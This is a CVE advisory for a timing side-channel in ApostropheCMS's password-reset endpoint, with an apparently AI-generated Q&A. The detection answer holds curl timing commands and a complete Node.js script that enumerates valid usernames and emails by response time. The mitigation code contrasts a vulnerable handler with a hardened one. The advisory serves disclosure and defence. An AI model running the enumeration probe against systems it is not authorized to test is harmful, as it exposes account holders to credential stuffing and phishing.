CVE-2026-33877
Timing Side-Channel Allows Account Enumeration in ApostropheCMS

Publication date: 2026-04-15

Last updated on: 2026-04-20

Assigner: GitHub, Inc.

Description
ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain a timing side-channel vulnerability in the password reset endpoint (/api/v1/@apostrophecms/login/reset-request) that allows unauthenticated username and email enumeration. When a user is not found, the handler returns after a fixed 2-second artificial delay, but when a valid user is found, it performs a MongoDB update and SMTP email send with no equivalent delay normalization, producing measurably different response times. The endpoint also accepts both username and email via an $or query, and has no rate limiting as the existing checkLoginAttempts throttle only applies to the login flow. This enables automated enumeration of valid accounts for use in credential stuffing or targeted phishing. Only instances that have explicitly enabled the passwordReset option are affected, as it defaults to false. This issue has been fixed in version 4.29.0.
CVSS Score
3.7 (Low)
Meta Information
Page generated: 2026-05-07
AI Q&A generated: 2026-04-16
EPSS evaluated: 2026-05-05
Affected Vendors & Products
1 associated CPE:
Vendor: apostrophecms
Product: apostrophecms
Version range: all versions before 4.29.0 (4.29.0 excluded)
CWE
CWE-208 (Observable Timing Discrepancy): Two separate operations in a product require different amounts of time to complete, in a way that is observable to an actor and reveals security-relevant information about the state of the product, such as whether a particular operation was successful or not.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-33877 is a timing side-channel vulnerability in the password reset endpoint of ApostropheCMS versions 4.28.0 and earlier. The vulnerability allows unauthenticated attackers to determine whether a username or email exists in the system by measuring differences in response times.

When a user is not found, the system responds after a fixed 2-second delay. However, if a valid user is found, the system performs database updates and sends an email without adding an equivalent delay. This causes the response time to differ measurably between valid and invalid users.

Because the endpoint accepts both username and email in a single query and lacks rate limiting, attackers can automate requests to enumerate valid accounts. This can be used for credential stuffing or targeted phishing attacks.

Only ApostropheCMS instances that have explicitly enabled the passwordReset option are affected, as it defaults to false. The issue is fixed in version 4.29.0.


How can this vulnerability impact me?

This vulnerability allows attackers to enumerate valid usernames and email addresses without authentication by exploiting timing differences in the password reset endpoint.

  • Attackers can confirm the existence of user accounts, which facilitates targeted credential stuffing attacks using known valid usernames or emails.
  • It enables targeted phishing campaigns against confirmed users by providing attackers with verified account information.
  • The lack of rate limiting on the password reset endpoint allows rapid automated probing, increasing the scale and speed of enumeration attacks.

Overall, this can lead to increased risk of account compromise and social engineering attacks.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by measuring the response times of the password reset endpoint (/api/v1/@apostrophecms/login/reset-request) when submitting usernames or emails. Invalid users consistently trigger a fixed 2-second delay, while valid users cause variable response times due to database updates and email sending operations.

To detect the vulnerability, you can perform repeated POST requests to the password reset endpoint with different usernames or emails and analyze the response times. Statistically significant deviations from the fixed 2-second delay indicate valid accounts.

  • Use curl or a similar tool to send POST requests with different usernames or emails to the endpoint, several times per input, since a single sample is easily skewed by network jitter.
  • Example command to establish the baseline with a user that cannot exist (expect roughly 2 seconds plus network round trip): curl -s -X POST https://your-apostrophe-instance/api/v1/@apostrophecms/login/reset-request -d '{"username":"invaliduser"}' -H 'Content-Type: application/json' -w '%{time_total}\n' -o /dev/null
  • Example command to test a potentially valid user (observe whether the response time differs from the baseline): curl -s -X POST https://your-apostrophe-instance/api/v1/@apostrophecms/login/reset-request -d '{"email":"user@example.com"}' -H 'Content-Type: application/json' -w '%{time_total}\n' -o /dev/null
  • A valid account may respond faster than 2 seconds (quick MongoDB update and SMTP handoff) or slower (slow mail server). The signal is a stable deviation from the fixed delay in either direction, not a faster response alone.
  • Probe only instances you are authorized to test, and prefer a throwaway account: a request that matches a real account sends that account a real password reset email.

Comparing the response times of these requests against the baseline reveals which usernames or emails correspond to valid accounts. An instance running 4.29.0 or later, or one that has never enabled passwordReset, is not affected.
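As an added example (not code from ApostropheCMS or from this page), the curl measurement above turned into a repeatable Node.js probe: it establishes a baseline from identifiers that cannot exist, takes several samples per candidate, and flags any candidate whose median deviates from the baseline by more than a tolerance. The request field names (username/email) follow the curl examples, while the 300 ms tolerance, the sample counts and the candidate list are assumptions; TARGET_URL must point at an instance you own, because each request that matches a real account sends that account a real reset email.

```javascript
// Added example, not ApostropheCMS code. Node.js 18+ (global fetch/performance).
// Assumed: the endpoint takes {"username": ...} or {"email": ...} as in the curl
// examples above; tolerance and sample counts are illustrative.

const ENDPOINT_PATH = '/api/v1/@apostrophecms/login/reset-request';

// Median: robust to the occasional slow sample caused by network jitter.
function median(values) {
  const sorted = [...values].sort((a, b) => a - b);
  const mid = Math.floor(sorted.length / 2);
  return sorted.length % 2 ? sorted[mid] : (sorted[mid - 1] + sorted[mid]) / 2;
}

// Median absolute deviation: how tightly the samples cluster around their median.
function mad(values) {
  const m = median(values);
  return median(values.map((v) => Math.abs(v - m)));
}

function summarize(samplesMs) {
  return { n: samplesMs.length, median: median(samplesMs), mad: mad(samplesMs) };
}

// Baseline = typical response time for identifiers that cannot exist: the fixed
// 2 s delay plus network round trip, measured rather than assumed.
function baselineFrom(bogusSummaries) {
  return median(bogusSummaries.map((s) => s.median));
}

// The not-found path is pinned to the baseline; a stable deviation in either
// direction (fast DB+SMTP, or a slow mail server) means the found path ran.
function looksValid(summary, baselineMs, toleranceMs) {
  return Math.abs(summary.median - baselineMs) > toleranceMs;
}

async function timeRequest(baseUrl, body) {
  const t0 = performance.now();
  await fetch(baseUrl + ENDPOINT_PATH, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify(body),
  });
  return performance.now() - t0;
}

async function sampleTimes(baseUrl, body, samples) {
  const times = [];
  for (let i = 0; i < samples; i++) times.push(await timeRequest(baseUrl, body));
  return summarize(times);
}

async function probe(baseUrl, candidates, { samples = 7, toleranceMs = 300 } = {}) {
  // Three random usernames that cannot exist establish the baseline.
  const bogus = Array.from({ length: 3 }, (_, i) => ({ username: `nx-${Date.now()}-${i}` }));
  const bogusSummaries = [];
  for (const body of bogus) bogusSummaries.push(await sampleTimes(baseUrl, body, samples));
  const baselineMs = baselineFrom(bogusSummaries);

  const results = [];
  for (const candidate of candidates) {
    const s = await sampleTimes(baseUrl, candidate, samples);
    results.push({ candidate, ...s, valid: looksValid(s, baselineMs, toleranceMs) });
  }
  return { baselineMs, results };
}

// Runs only when TARGET_URL is set; point it at an instance you own, because a
// request that matches a real account sends that account a real reset email.
if (process.env.TARGET_URL) {
  const candidates = [{ username: 'admin' }, { email: 'someone@example.com' }]; // assumed
  probe(process.env.TARGET_URL, candidates)
    .then((r) => console.log(JSON.stringify(r, null, 2)))
    .catch((e) => { console.error(e); process.exit(1); });
}
```

The baseline is measured rather than hard-coded at 2 seconds because the observed figure includes TLS and network round trip; the mad field is reported so that a candidate with a wide spread (for example one whose samples straddle the baseline) can be re-sampled rather than trusted.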


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include:

  • Upgrade ApostropheCMS to version 4.29.0 or later, where the vulnerability is fixed.
  • If upgrading is not immediately possible, disable password reset by removing the passwordReset option or setting it to false (the default); only instances that explicitly enabled it are affected.
  • Until then, rate limit the reset-request endpoint per source address (at the reverse proxy or in the application), since the existing checkLoginAttempts throttle covers only the login flow and does not protect this endpoint.
  • If you maintain a custom reset handler, make its response time independent of whether the user exists. A minimum floor (e.g., 2 seconds) on every path is the starting point, but padding up to a minimum still leaks whenever the MongoDB update and SMTP send take longer than the floor; the robust form responds after a fixed delay and performs the update and email send outside the request's response path.
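The handler shape the description and the mitigation list describe, as an added example in Node.js that is not ApostropheCMS code: the vulnerable form (fixed delay only on the not-found branch) beside a hardened form that rate-limits per source address, runs the MongoDB update and SMTP send detached from the response path, and waits the same fixed delay on every path. findUser, updateUser, sendMail, the log hook and the limiter sizes are assumed stand-ins, not the project's API.

```javascript
// Added example, not ApostropheCMS code. deps.findUser/updateUser/sendMail are assumed
// stand-ins for the real MongoDB and SMTP calls; limiter sizes are illustrative.

const FIXED_DELAY_MS = 2000; // the constant the advisory describes on the not-found path
const GENERIC_RESPONSE = { status: 200, body: { message: 'If that account exists, an email was sent.' } };

const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));

// Per-key sliding-window limiter; `now` is injectable so tests need not wait in real time.
class SlidingWindowLimiter {
  constructor({ limit, windowMs, now = () => Date.now() }) {
    this.limit = limit;
    this.windowMs = windowMs;
    this.now = now;
    this.hits = new Map(); // key -> timestamps of requests allowed inside the window
  }

  allow(key) {
    const t = this.now();
    const recent = (this.hits.get(key) || []).filter((ts) => t - ts < this.windowMs);
    const allowed = recent.length < this.limit;
    if (allowed) recent.push(t);
    this.hits.set(key, recent);
    return allowed;
  }
}

// The $or lookup the advisory describes: one identifier may match username or email.
function userQuery(identifier) {
  return { $or: [{ username: identifier }, { email: identifier }] };
}

// VULNERABLE shape: only the not-found branch waits the fixed 2 s; the found branch
// returns whenever the update and the SMTP round trip finish, so timing reveals the branch.
async function vulnerableResetRequest(identifier, deps) {
  const user = await deps.findUser(userQuery(identifier));
  if (!user) {
    await sleep(FIXED_DELAY_MS);
    return GENERIC_RESPONSE;
  }
  await deps.updateUser(user); // store the reset token
  await deps.sendMail(user);   // SMTP send; duration depends on the mail server
  return GENERIC_RESPONSE;
}

// HARDENED shape: per-source rate limit, the lookup/update/send chain runs detached from
// the response path, and every response waits the same fixed delay. Padding "up to" a
// minimum after awaiting the work would still leak whenever the SMTP send outlasted the
// floor; detaching the work removes that dependency from the observed timing.
async function hardenedResetRequest(identifier, ip, deps) {
  if (!deps.limiter.allow(ip)) {
    return { status: 429, body: { message: 'Too many requests' } }; // independent of identifier
  }
  (async () => {
    const user = await deps.findUser(userQuery(identifier));
    if (!user) return;
    await deps.updateUser(user);
    await deps.sendMail(user);
  })().catch((err) => deps.log(err)); // runs detached; failures are logged, never surfaced
  await sleep(FIXED_DELAY_MS);
  return GENERIC_RESPONSE;
}

// Stand-alone demo with stubbed deps (DEMO=1 node reset.js): prints timings for both shapes.
if (process.env.DEMO) {
  const deps = {
    findUser: async (q) => (q.$or[0].username === 'alice' ? { username: 'alice' } : null), // constructed
    updateUser: async () => sleep(50),  // pretend MongoDB update
    sendMail: async () => sleep(400),   // pretend SMTP round trip
    log: console.error,
    limiter: new SlidingWindowLimiter({ limit: 5, windowMs: 60000 }),
  };
  (async () => {
    for (const id of ['alice', 'nobody']) {
      let t0 = performance.now();
      await vulnerableResetRequest(id, deps);
      console.log(`vulnerable ${id}: ${Math.round(performance.now() - t0)} ms`);
      t0 = performance.now();
      await hardenedResetRequest(id, '203.0.113.5', deps);
      console.log(`hardened   ${id}: ${Math.round(performance.now() - t0)} ms`);
    }
  })();
}
```

With the stubbed deps the vulnerable shape answers "alice" in about 450 ms and "nobody" in about 2000 ms, while the hardened shape answers both in about 2000 ms. Detaching the email send means a failed SMTP connection no longer changes the response either; it is logged for operators instead.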

How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

This vulnerability allows unauthenticated attackers to enumerate valid usernames and email addresses by exploiting timing differences in the password reset endpoint. Such user enumeration can facilitate targeted credential stuffing and phishing attacks, potentially leading to unauthorized access or exposure of personal data.

From a compliance perspective, this vulnerability could impact adherence to standards like GDPR and HIPAA, which require protection of personal data and user privacy. The ability to confirm valid user accounts may increase the risk of data breaches or unauthorized access, thereby undermining the confidentiality and security controls mandated by these regulations.

However, the vulnerability is rated as low severity (CVSS 3.7) and only affects instances with the password reset feature explicitly enabled. Mitigations such as normalizing response times and implementing rate limiting reduce the risk of exploitation.

